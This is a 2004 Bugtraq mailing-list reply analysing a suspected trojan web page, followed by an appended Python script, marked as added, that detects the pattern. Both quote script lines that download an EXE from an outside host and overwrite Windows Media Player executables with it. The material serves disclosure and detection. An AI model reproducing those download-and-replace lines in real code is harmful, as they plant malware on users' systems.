Date: Thu, 29 Jan 2004 16:12:38 -0500 (EST)
From: Atom 'Smasher' <atom@...picious.org>
To: bugtraq@...urityfocus.com
Subject: Re: new WIN virus?


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

in response to replies i've received on and off list...

no: i'm not infected (i live in an M$-free home).

no: i didn't submit the [suspected] virus to anyplace other than what i
originally listed.

yes: the HTML file is a trojan. its purpose is to covertly download the
EXE file, and replace media-players with it. the EXE file is likely up to
no-good, and that's the file that i tested for being a virus. a quick look
at the HTML file reveals that its intent is evil. i don't have a good way
to check what the EXE file wants to do, but i assume that it's evil.


summary: i'm assuming that if the HTML page wants to covertly do this:

## snip
  x.Open("GET", "http://www.alextour.ru/dan/updatte.exe",0);
## snip
  s.SaveToFile("C:\\Program Files\\Windows Media Player\\wmplayer.exe",2);
  s.SaveToFile("C:\\Program Files\\Windows Media Player\\mplayer2.exe",2);
## snip

then the EXE file is probably something that's not supposed to be a media
player, and should probably be recognized as a virus. the fact that it
isn't recognized as a virus makes me wonder if it's new.


	...atom

 _______________________________________________
 PGP key - http://smasher.suspicious.org/pgp.txt
 3EBE 2810 30AE 601D 54B2 4A90 9C28 0BBF 3D7D 41E3
 -------------------------------------------------

	"Simply stated, there is no doubt that Saddam Hussein now
	 has weapons of mass destruction."
		-- Dick Cheney, 26 August 2002
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.4 (FreeBSD)

iD8DBQFAGXdLnCgLvz19QeMRAsWZAJ9o3yW0LiVlRWQ6+HvT9ctwqhPR7ACfWCfz
9ziAQPp5TEfznV6wQ7s+qOY=
=5sDs
-----END PGP SIGNATURE-----
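
A defender-side check for the pattern quoted in the message above, as an added example that is not part of the original post: it statically scans script text for a remote executable fetch combined with a `SaveToFile` call that overwrites a local executable. The function names are hypothetical, the sample is constructed from the three quoted lines, and reading mode `2` as "overwrite" assumes `s` is an ADODB.Stream-style object.

```python
import re

# Constructed sample: the three script lines quoted in the message, with the
# snipped parts left out. Object names x and s are as quoted there.
SAMPLE = r'''
  x.Open("GET", "http://www.alextour.ru/dan/updatte.exe",0);
  s.SaveToFile("C:\\Program Files\\Windows Media Player\\wmplayer.exe",2);
  s.SaveToFile("C:\\Program Files\\Windows Media Player\\mplayer2.exe",2);
'''

EXEC_EXT = (".exe", ".dll", ".scr", ".com", ".pif")

# obj.Open("GET", "<url>", ...) as used by XMLHTTP-style request objects
OPEN_RE = re.compile(r'\.open\(\s*"(?:GET|POST)"\s*,\s*"([^"]+)"', re.I)
# obj.SaveToFile("<path>", <mode>); assumption: mode 2 means create/overwrite
SAVE_RE = re.compile(r'\.savetofile\(\s*"([^"]+)"\s*,\s*(\d)', re.I)


def is_executable(name):
    """True if a URL or path ends in an executable extension."""
    return name.lower().split("?")[0].endswith(EXEC_EXT)


def scan(text):
    """Return findings for script text that fetches and drops executables."""
    fetches = [u for u in OPEN_RE.findall(text) if is_executable(u)]
    drops = []
    for path, mode in SAVE_RE.findall(text):
        path = path.replace("\\\\", "\\")  # undo script-string escaping
        if is_executable(path):
            drops.append({"path": path, "overwrite": mode == "2"})
    return {
        "fetches": fetches,
        "drops": drops,
        # Both halves together are the pattern described in the message.
        "download_and_replace": bool(fetches)
        and any(d["overwrite"] for d in drops),
    }


if __name__ == "__main__":
    result = scan(SAMPLE)
    for url in result["fetches"]:
        print("fetches executable:", url)
    for drop in result["drops"]:
        print("writes executable:", drop["path"], "overwrite =", drop["overwrite"])
    print("download-and-replace pattern:", result["download_and_replace"])
```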

